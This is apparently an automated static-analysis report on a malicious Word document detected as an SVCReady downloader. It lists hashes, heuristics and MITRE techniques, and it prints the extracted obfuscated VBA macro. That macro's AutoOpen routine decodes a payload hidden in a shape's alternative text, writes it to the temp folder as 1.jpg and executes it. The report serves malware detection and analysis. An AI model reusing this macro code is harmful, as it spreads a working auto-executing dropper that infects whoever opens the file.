Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5352a82584dd199a…

MALICIOUS

Office (OOXML)

117.1 KB Created: 2020-07-23 12:37:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-07
MD5: 44e7937368ec55b7826d49f29821798f SHA-1: 8236931b18d0a30e4ab8636370b6ea41a8602c31 SHA-256: 5352a82584dd199a0c02c76f5a03a1ab30008956fc4f85c030826f93abeb9963
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OOXML document containing a VBA macro. The AutoOpen macro executes a shell command that writes a file to the temporary directory and then executes it. The macro uses Environ("tmp") to construct the path C:\Windows\Temp\1.jpg, which is then executed by WScript.Shell. This indicates a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4792 bytes
SHA-256: 61d97b569a1407a24a19304cbbc32be8bc1fbcd1dfa7208a9ed6558836bfe3c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bbc79467"
Function a016c332()
a016c332 = ActiveWindow.DisplayLeftScrollBar
End Function
Function ca09aeed()
ca09aeed = ActiveWindow.Left
End Function
Function bbae29b5()
bbae29b5 = 10744.411065918
End Function
Function cbc4d8e4()
cbc4d8e4 = Application.ActiveDocument.AttachedTemplate
End Function
Sub AutoOpen()
Dim d3f0c64c As New dcb13349
aaa = c891bee4(d13fa101)
b196ad7f = d3f0c64c.d2c1fced(aaa, "")
ae610e55 eb6f8b4e, b196ad7f
Dim b034ccb1 As New WshShell
Call b034ccb1.exec(ecde239a & " " & eb6f8b4e)
End Sub

Attribute VB_Name = "f9f3fb37"
Function db0feade()
db0feade = ActiveWindow.HorizontalPercentScrolled
End Function
Function b31ce60b()
b31ce60b = ActiveWindow.StyleAreaWidth
End Function
Function d8cd4856()
d8cd4856 = 17508 / 6
End Function
Function d0d048c9()
d0d048c9 = ActiveWindow.HorizontalPercentScrolled
End Function
Sub ae610e55(f0a0a2c3, cf1076eb)
Dim dc2058c8
dc2058c8 = FreeFile
Open f0a0a2c3 For Output As #dc2058c8
Print #dc2058c8, b3062764(cf1076eb)
Close #dc2058c8
End Sub
Function eb6f8b4e()
eb6f8b4e = Environ("tmp") & "\1.jpg"
End Function
Function a21a5d01()
a21a5d01 = ActiveWindow.VerticalPercentScrolled
End Function
Function f65e87ab()
f65e87ab = "Misplace gondolas delegation windowless dilemma"
End Function
Function f6d6392f()
f6d6392f = 41114.073787526
End Function
Function d58d4d56(bdf5b14cnp As String) As Boolean
If 509 > Len(bdf5b14cnp) Then
d58d4d56 = False
End If
End Function
Function c891bee4(da260a86)
For a950a1bb = 1 To Len(da260a86) Step 3
cbf611e4 = cbf611e4 & Mid(da260a86, a950a1bb, 1)
Next
c891bee4 = cbf611e4
End Function
Function a36723a7()
a36723a7 = "ajHLBqi"
End Function
Function c04c394e()
c04c394e = ActiveWindow.DisplayVerticalRuler
End Function
Function c47655c4()
c47655c4 = ActiveWindow.SplitVertical
End Function
Function a6c5678b()
a6c5678b = 1453294464 / 28736
End Function
Sub ba4b90ba()
End Sub
Function b19494bc()
b19494bc = 56
End Function
Function c3893206()
c3893206 = ActiveWindow.View
End Function
Function d56315d1()
d56315d1 = ActiveWindow.Height
End Function
Function c3d2ac9a()
c3d2ac9a = ActiveWindow.Index
End Function
Function b3062764(cf1076eb)
b3062764 = StrConv(cf1076eb, 64)
End Function
Function a8c38f44()
a8c38f44 = ActiveWindow.DisplayLeftScrollBar
End Function
Function dcf62b5f()
dcf62b5f = ActiveWindow.HorizontalPercentScrolled
End Function
Function c153b519()
c153b519 = ActiveWindow.Height
End Function
Function f220613f()
f220613f = ActiveWindow.Top
End Function
Function d13fa101()
d13fa101 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a304ddd3()
a304ddd3 = Application.ActiveDocument.CompatibilityMode
End Function
Function c932ae8a()
c932ae8a = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function bdc742e7()
bdc742e7 = ActiveWindow.HorizontalPercentScrolled
End Function
Function cb793ea6()
cb793ea6 = "Indices enshrine agog happenings"
End Function
Function ecde239a()
ecde239a = c891bee4("rd0e1egf9s9bv31rc738b202")
End Function

Attribute VB_Name = "dcb13349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a98983b0() As Long
Dim a224b4f2 As Long
Dim adbc91f9 As Integer
adbc91f9 = 7
For a224b4f2 = 11 To 60
adbc91f9 = adbc91f9 - a224b4f2
Next a224b4f2
a98983b0 = adbc91f9
End Function
Function f198f26f()
f198f26f = Application.ActiveDocument.Application
End Function
Function ed7034a3()
ed7034a3 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Funct
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 28672 bytes
SHA-256: 51aea962db7cedd73774824382e1eb4c141c4b29102b5b4d23793fc4bb957a61